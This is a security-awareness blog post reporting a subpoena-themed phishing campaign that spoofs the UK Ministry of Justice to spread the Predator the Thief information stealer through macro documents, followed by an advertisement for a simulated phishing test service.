skip to Main Content
+44 (0) 1628 308038

Subpoena phishing emails serve nasty Predator Thief infection

Phishing attack

Phishers have been spotted delivering subpoena-themed emails spoofed to look like they’re coming from the UK Ministry of Justice and attempting to infect their targets with Predator the Thief information stealer malware payloads. This malspam campaign mainly targeted retail and insurance companies, with the attackers trying to trick their potential victims into opening an embedded link pointing to redirection chain leading to a Word document with malicious macros.

A warning that the targets have to comply with the notice within two weeks is used in the phishing emails to add a sense of urgency that will entice the email readers to click on the link to find more information on why they have been “subpoenaed.”

Sample phishing email
Sample phishing email

“You have 14 days to provide notice. If you do not so prepare yourself, the court will take place without you,” the phishing email says.

This campaign’s operators also ask their potential victims to “prepare all necessary documents that are listed in the attached file” to maximise the user’s incentive to click the malicious link.

Once they click the link, the targets are sent through a multi-step redirection chain used to drop the final information stealer payload. 

Thus, the link first opens a Google Docs document containing a redirector link to a OneDrive resource that downloads a Word document “used as a first stage downloader to execute a sample of Predator the Thief.”

“The macro, upon execution, downloads the malware via PowerShell, which is a sample of the Predator the Thief information stealer,” the Cofense researchers also discovered.

Predator the Thief is a publicly sold data stealer malware sold as a package containing a builder and a C2 panel. Its creators also provide customer support services via Telegram channels. After infecting a machine, this info stealer starts harvesting information from various folders including documents, and cryptocurrency .dat and .wallet Ethereum, Multibit, Electrum, Armory, Bytecoin, and Bitcoin files.

Cofense, who discovered the threat, state the malware also collects cookies from an extensive list of web browsers including Chrome, Firefox, and a long list of lesser-known ones, account credentials for apps such as Filezilla, WinFTP, Steam, and Discord, as well as screen snapshots. An extensive list of indicators of compromise (IOCs) including IP addresses and domains for C2 servers and redirectors, as well as URLs for the documents used as lures in this campaign are available in the second link.

With thanks to the Cyber Defence Alliance and BleepingComputer. The full story is here:

New-school Security Awareness Training can train your users to be on the alert for those kinds of “tells,” then test their reactions to simulated phishing emails based on actual phishes used by real malicious actors in the wild. It’s the best means to ensure that the only ones managing your teams are your own people — not confidence tricksters looking to muscle their way into your organisation’s network.

Free Phishing Security Test

Would your users fall for convincing phishing attacks? Take the first step now and find out before the bad guys do. Plus, see how you stack up against your peers with phishing Industry Benchmarks. The Phish-prone percentage is usually higher than you expect and is great ammo to get budget.

PST Results

Here’s how it works:

Immediately start your test for up to 100 users (no need to talk to anyone)

Customise the phishing test template based on your environment

Choose the landing page your users see after they click

Show users which red flags they missed, or a 404 page

Get a PDF emailed to you in 24 hours with your Phish-prone % and charts to share with management

See how your organisation compares to others in your industry

PS: Don’t like to click on redirected buttons? Cut & Paste this link in your browser:

Close search


Back To Top